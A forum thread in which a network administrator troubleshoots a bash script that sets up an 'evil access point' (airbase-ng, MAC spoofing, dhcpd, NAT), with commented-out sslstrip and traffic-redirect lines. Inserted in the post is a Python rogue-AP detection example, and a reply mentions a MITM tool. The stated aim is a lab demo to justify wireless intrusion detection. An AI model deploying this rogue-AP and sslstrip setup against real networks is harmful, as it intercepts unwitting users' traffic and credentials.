Thread: issue with setting up an "evil access point" script.

  1. #1
    I've demoed some of the tools on Kali with my management in order to get funding for new pieces of hardware and software to combat "rogue elements" on the corporate network. Right now I'm working on a proposal to fund the purchase of Motorola AirDefense and as part of this I'm trying to set up a simple "evil access point". I'm working in my home lab ATM and am having issues with the script for this.

    (I prefer to use shell scripts over GUI tools because the management seems to respond better to seeing text fly by instead of GUI tools... go figure).

    A while back I tried doing this under Backtrack, but couldn't get it working quite right. I dug up the old script I was working with, which IIRC was either one I downloaded or something hacked together from different scripts, but either way I never got it working right.

    Trying this on Kali 2, I've made some changes from the original script:

    #!/bin/bash
    #____[start of config]_________________________
    # these two values can be overwritten using
    # arguments to the command
    # (the default values did not survive in the post as extracted;
    #  the CHANGE_ME strings below are placeholders, not the original values)
    essid="CHANGE_ME_ESSID"
    channel="CHANGE_ME_CHANNEL"
    # addressing used by at0 and the dhcpd.conf below
    # (same situation: placeholders standing in for values missing from the post)
    subnet="CHANGE_ME_SUBNET"
    netmask="CHANGE_ME_NETMASK"
    broadcast="CHANGE_ME_BROADCAST"
    router="CHANGE_ME_ROUTER"
    dns="CHANGE_ME_DNS"
    startip="CHANGE_ME_STARTIP"
    endip="CHANGE_ME_ENDIP"
    #____[end of config]___________________________
    # override the default essid if one is provided
    if [[ ! -z ${1} ]]; then
        essid="${1}"
    fi
    # override the default channel if one is provided
    if [[ ! -z ${2} ]]; then
        channel="${2}"
    fi
    function clear_iptables {
        iptables --flush
        iptables --table nat --flush
        iptables --table nat --delete-chain
        iptables --delete-chain
    }
    function cleanup {
        echo "* cleaning up"
        # remove the NAT/forwarding rules added below
        # (this call is not in the post as extracted)
        clear_iptables
        killall sslstrip
        killall dhcpd
        rm -rf /tmp/dhcpd
        rm -f /tmp/dhcpd.conf
        ifconfig at0 down
        killall airbase-ng
        echo "* end of script"
        exit 0
    }
    trap cleanup INT
    echo "* creating dummy dhcpd.conf"
    cat << EOF > /tmp/dhcpd.conf
    ddns-update-style standard;
    default-lease-time 600;
    max-lease-time 7200;
    subnet ${subnet} netmask ${netmask} {
        option subnet-mask ${netmask};
        option broadcast-address ${broadcast};
        option routers ${router};
        option domain-name-servers ${dns};
        range ${startip} ${endip};
    }
    EOF
    echo "* starting airbase-ng essid ${essid} on channel ${channel}"
    airbase-ng -e "${essid}" -q -c ${channel} wlan0mon &
    sleep 3
    echo "* spoofing MAC address for at0"
    ifconfig at0 down
    macchanger -m 00:17:3F:03:13:37 at0
    echo "* bringing up at0 and setting route"
    ifconfig at0 up
    ifconfig at0 ${router} netmask ${netmask}
    route add -net ${subnet} netmask ${netmask} gw ${router}
    echo "* starting dhcpd"
    mkdir -p /tmp/dhcpd
    touch /tmp/dhcpd/dhcpd.leases
    chown -R dhcpd:dhcpd /tmp/dhcpd
    dhcpd -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/ -lf /tmp/dhcpd/dhcpd.leases at0
    echo "* setting up forwarding rules"
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    # mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
    # echo "* using ${mygw} as gateway"
    # iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}
    # iptables -t nat -D PREROUTING 1
    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    echo 1 > /proc/sys/net/ipv4/ip_forward
    # uncomment these two lines to turn on sslstrip
    # echo "* starting sslstrip and logging results to log.txt"
    # sslstrip -f -k -w log.txt &
    echo "* setup complete, now we wait for connections"
    echo "* enter CTRL-C to quit and cleanup"
    while :; do
        sleep 60
    done
    I can't pinpoint where this is going wrong. I can connect to the AP, but I'm not receiving an IP address via dhcp. I want to be able to connect to the AP and have internet access through it for any client connected to it to simulate a person standing up a malicious AP where the victim is completely unaware that they're at risk of being compromised. It also serves to strengthen my argument against our guest network being wide open so I can clamp down on unfettered access to it.
    Last edited by parsec; 2015-11-17 at 19:45.
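    The point of the demo above is to justify wireless intrusion detection, so the complementary piece a defender wants is the detection side: given what a wireless sensor sees, which beacons are a rogue or evil-twin AP? The following is an added example, not code from the thread or from any product named in it. It assumes a hypothetical inventory of managed APs (BSSID to ESSID) and a constructed scan in a deliberately simplified `bssid,channel,privacy,essid` line format (not airodump-ng's real CSV layout), and flags three conditions: a corporate ESSID advertised from a BSSID that is not in the inventory (evil twin, the case the script above produces with its spoofed `00:17:3F:03:13:37` MAC), a case-insensitive look-alike of a corporate ESSID, and a managed BSSID advertising an ESSID it should not.

```python
"""Rogue-AP triage over a constructed wireless scan (added example, not from the thread)."""
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class Observation:
    bssid: str
    channel: int
    privacy: str   # e.g. "OPN", "WPA2" (constructed vocabulary)
    essid: str


@dataclass(frozen=True)
class Finding:
    bssid: str
    essid: str
    rule: str


# Hypothetical inventory of managed access points: BSSID -> ESSID it should broadcast.
MANAGED_APS: Dict[str, str] = {
    "AA:BB:CC:00:00:01": "CorpWiFi",
    "AA:BB:CC:00:00:02": "CorpWiFi",
    "AA:BB:CC:00:00:03": "CorpGuest",
}
CORPORATE_SSIDS: Set[str] = set(MANAGED_APS.values())

# Constructed scan output in a simplified format: bssid,channel,privacy,essid
SAMPLE_SCAN = """\
# bssid,channel,privacy,essid
AA:BB:CC:00:00:01,1,WPA2,CorpWiFi
AA:BB:CC:00:00:02,6,WPA2,CorpWiFi
AA:BB:CC:00:00:03,11,OPN,CorpGuest
00:17:3F:03:13:37,6,OPN,CorpWiFi
DE:AD:BE:EF:00:01,1,OPN,corpwifi
AA:BB:CC:00:00:02,6,WPA2,Lab-Test
11:22:33:44:55:66,3,WPA2,Neighbour-Net
"""


def parse_scan(text: str) -> List[Observation]:
    """Parse the simplified scan format; ESSID is the last field so it may contain commas."""
    observations = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        bssid, channel, privacy, essid = (f.strip() for f in line.split(",", 3))
        observations.append(Observation(bssid.upper(), int(channel), privacy.upper(), essid))
    return observations


def classify(observations: List[Observation],
             managed: Dict[str, str],
             corporate: Set[str]) -> List[Finding]:
    """Apply the three rogue-AP rules and return one Finding per suspicious beacon."""
    findings: List[Finding] = []
    lookalike_index = {s.lower(): s for s in corporate}
    for obs in observations:
        expected = managed.get(obs.bssid)
        if expected is not None:
            # Managed radio: only complain if it advertises an ESSID it should not.
            if obs.essid != expected:
                findings.append(Finding(obs.bssid, obs.essid,
                                        f"managed BSSID advertising unexpected ESSID (expected {expected})"))
            continue
        if obs.essid in corporate:
            # Exact corporate name from a radio we do not own: classic evil twin.
            findings.append(Finding(obs.bssid, obs.essid,
                                    "corporate ESSID from unmanaged BSSID (evil twin)"))
        elif obs.essid.lower() in lookalike_index:
            findings.append(Finding(obs.bssid, obs.essid,
                                    f"look-alike of corporate ESSID {lookalike_index[obs.essid.lower()]}"))
    return findings


def run_sample() -> List[Finding]:
    """Run the rules over the constructed scan against the hypothetical inventory."""
    return classify(parse_scan(SAMPLE_SCAN), MANAGED_APS, CORPORATE_SSIDS)


if __name__ == "__main__":
    for finding in run_sample():
        print(f"{finding.bssid}  {finding.essid!r:20}  {finding.rule}")
```

    On the constructed scan this reports the spoofed `00:17:3F:03:13:37` radio as an evil twin of `CorpWiFi`, the open `corpwifi` network as a look-alike, and the managed `AA:BB:CC:00:00:02` radio as advertising `Lab-Test`; the neighbour's network is ignored because it matches nothing in the corporate namespace. In a real deployment the inventory would come from the WLAN controller and the scan from a dedicated sensor, and the look-alike rule would usually be widened beyond case folding.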

  2. #2
    I didn't look at your script but this tool might be easier to use
    And you can mitm with this
